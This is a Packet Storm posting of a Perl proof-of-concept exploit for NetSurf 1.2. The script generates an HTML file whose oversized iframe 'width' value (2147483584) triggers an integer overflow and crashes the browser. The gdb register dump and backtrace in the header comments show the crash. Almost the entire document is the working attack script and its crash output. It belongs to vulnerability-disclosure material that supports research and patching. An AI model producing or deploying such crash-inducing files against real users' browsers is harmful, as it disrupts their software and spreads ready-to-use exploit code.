NetSurf version 1.2 width remote integer overflow proof of concept exploit.
0c7684f810f8af17eec26eac56e1a747#!/usr/bin/perl
# netsurf_width_intof2.pl
# Netsurf 1.2 'width' Remote Integer Overflow PoC Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
#
# Program received signal SIGABRT, Aborted.
# [Switching to Thread 0xb6d78720 (LWP 28933)]
# 0xb804e430 in __kernel_vsyscall ()
# (gdb) i r
# eax 0x0 0
# ecx 0x7105 28933
# edx 0x6 6
# ebx 0x7105 28933
# esp 0xbfb4cfe4 0xbfb4cfe4
# ebp 0xbfb4cffc 0xbfb4cffc
# esi 0xb7532b97 -1219286121
# edi 0xb754fff4 -1219166220
# eip 0xb804e430 0xb804e430 <__kernel_vsyscall+16>
# eflags 0x206 [ PF IF ]
# cs 0x73 115
# ss 0x7b 123
# ds 0x7b 123
# es 0x7b 123
# fs 0x0 0
# gs 0x33 51
# (gdb) bt
# 0 0xb804e430 in __kernel_vsyscall ()
# 1 0xb7421880 in raise () from /lib/tls/i686/cmov/libc.so.6
# 2 0xb7423248 in abort () from /lib/tls/i686/cmov/libc.so.6
# 3 0xb741a72e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6
# 4 0x080a7cdd in ?? ()
# 5 0x080a75e2 in ?? ()
# 6 0x080a747d in ?? ()
# 7 0x080ab3f0 in layout_document ()
# 8 0x0809f073 in html_reformat ()
# 9 0x080a0d95 in html_convert ()
# 10 0x0805980c in content_convert ()
# 11 0x0805cc49 in ?? ()
# 12 0x0805a6c1 in fetch_send_callback ()
# 13 0x08060c23 in ?? ()
# 14 0x0806110f in ?? ()
# 15 0x0805afe9 in fetch_poll ()
# 16 0x08088276 in gui_poll ()
# 17 0x0807fe94 in main ()
#
# Adv Ref: netsurf_multiple_adv.txt
$filename = $ARGV[0];
if(!defined($filename))
{
print "Usage: $0 <filename.html>\n";
}
$head = "<html>" . "\n";
$trig = "<iframe src=\"test.jpg\" width=\"2147483584\">" . "\n";
#$trig = "<hr width=\"2147483584\">" . "\n";
$foot = "</html>";
$data = $head . $trig . $foot;
open(FILE, '>' . $filename);
print FILE $data;
close(FILE);
exit;
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!